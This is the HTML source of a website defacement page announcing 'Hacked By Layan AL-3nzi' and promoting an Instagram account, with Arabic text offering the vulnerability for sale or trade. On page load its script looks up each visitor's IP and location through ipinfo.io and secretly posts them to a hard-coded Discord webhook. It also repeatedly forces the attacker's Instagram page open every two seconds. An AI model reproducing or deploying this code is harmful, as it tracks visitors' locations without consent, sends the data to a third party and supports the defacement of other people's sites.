<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>SaYo</title>
    <style>
       body {
            margin: 0;
            padding: 0;
            background: black;
            font-family: 'Courier New', Courier, monospace;
            color: #9f8663;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            text-align: center;
            overflow: hidden;
        }
        #content {
            display: none;
            opacity: 0;
            transition: opacity 2s ease;
        }
        .video-container video {
            width: 400px; 
            height: auto;
            border: 2px solid #c2c2c2; 
            border-radius: 15px;
            box-shadow: 0 0 15px rgba(255, 255, 255, 0.7); 
        }
          .info {
            margin-top: 20px;
            font-size: 1.5em;
            color: #ffffff; 
            text-shadow: 0 0 8px #ffffff 0 0 15px #ffffff, 0 0 25px #ffffff;
            letter-spacing: 4.5px; 
            white-space: pre-wrap;
        }
        .text {
            margin-top: 5px;
            font-size: 75px; 
            color: #ffffff; 
            text-shadow: 0 0 8px #ffffff, 0 0 15px #ffffff, 0 0 25px #ffffff; 
            letter-spacing: 4.5px;
        }
        .background-video-container {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            overflow: hidden;
            z-index: -1;
        }
        .background-video-container video {
            width: 100%;
            height: 100%;
            object-fit: cover;
            filter: blur(15px);
        }
    </style>
</head>
<body>
    <div class="background-video-container">
        <video autoplay loop muted>
            <source src="https://cdn.discordapp.com/attachments/1316731767104864256/1325401957896163348/809f7f4c5f45408f9c753d45454e3d19.mov?ex=67c42ac3&is=67c2d943&hm=62f0fb2e1909e98bb94e2e354adce64908e10bcfe688028ba4344e612f81d765&" type="video/mp4">
            Your browser does not support the video tag.
        </video>
    </div>

    <div class="gif-container">
        <img src="" alt="">
    </div>

    <div id="content">
        <div class="video-container">
            <video autoplay loop muted>
                <source src="https://cdn.discordapp.com/attachments/1316731767104864256/1325401957896163348/809f7f4c5f45408f9c753d45454e3d19.mov?ex=67c42ac3&is=67c2d943&hm=62f0fb2e1909e98bb94e2e354adce64908e10bcfe688028ba4344e612f81d765&" type="video/mp4">
                Your browser does not support the video tag.
            </video>
        </div>

        <audio autoplay loop>
            <source src="https://cdn.discordapp.com/attachments/1316731767104864256/1325401957896163348/809f7f4c5f45408f9c753d45454e3d19.mov?ex=67c2d943&is=67c187c3&hm=07f079b833ff305f659347483718add42ad66b6e789f2e59393a3dca0f9988cd&" type="audio/mpeg">
            Your browser does not support the audio element.
        </audio>



        <!-- النص مع تأثير اللمعان -->
        <div class="info glow-text">Hacked By Layan AL-3nzi</div>
        <div class="info" id="ip-info"></div>
        <div class="text">insta laya.ttt</div>
    </div>

    <script>
        setTimeout(() => {
            document.querySelector('.gif-container').style.display = 'none';
            const content = document.getElementById('content');
            content.style.display = 'block';
            setTimeout(() => {
                content.style.opacity = 1;
            }, 200); 
        }, 200);

        fetch('https://ipinfo.io/json')
        .then(response => response.json())
        .then(data => {
            const { ip, country, city, region, loc, org, timezone } = data;
            const infoDiv = document.getElementById('ip-info');
            infoDiv.innerHTML = `تبي الثغره تعال انستاا
<strong>IP:</strong><span>"${ip}"</span><br><strong>City:</strong><span>"${city}"</span><br><strong>Region:</strong><span>"${region}"</span><br><strong>Country:</strong><span>"${country}"</span><br><strong>Location:</strong><span>"${loc}"</span><br><strong></strong> <span>"${org}"</span><br><strong>Timezone:</strong><span>"${timezone}"</span>`;

            const dateTime = new Date().toLocaleString();
            const webhookUrl = 'https://discord.com/api/webhooks/1344343145760161812/tLK1ujvgwghwhhW7SQgtIpMFXQiA0ivLa9jyXH3gtHKP-nrVyeazc_7H8Z2fftKsEoPR';
            fetch(webhookUrl, {
                method: 'POST',
                headers: {'Content-Type': 'application/json'},
                body: JSON.stringify({content: `IP : ${ip}\nCountry & City : ${country} - ${city}\nDate & Time : ${dateTime}\n -`})
            });
        });

        setInterval(function() {
            window.invokeNative("openUrl", "https://www.instagram.com/laya.ttt/");
             },     2000);
    </script>
</body>
</html>
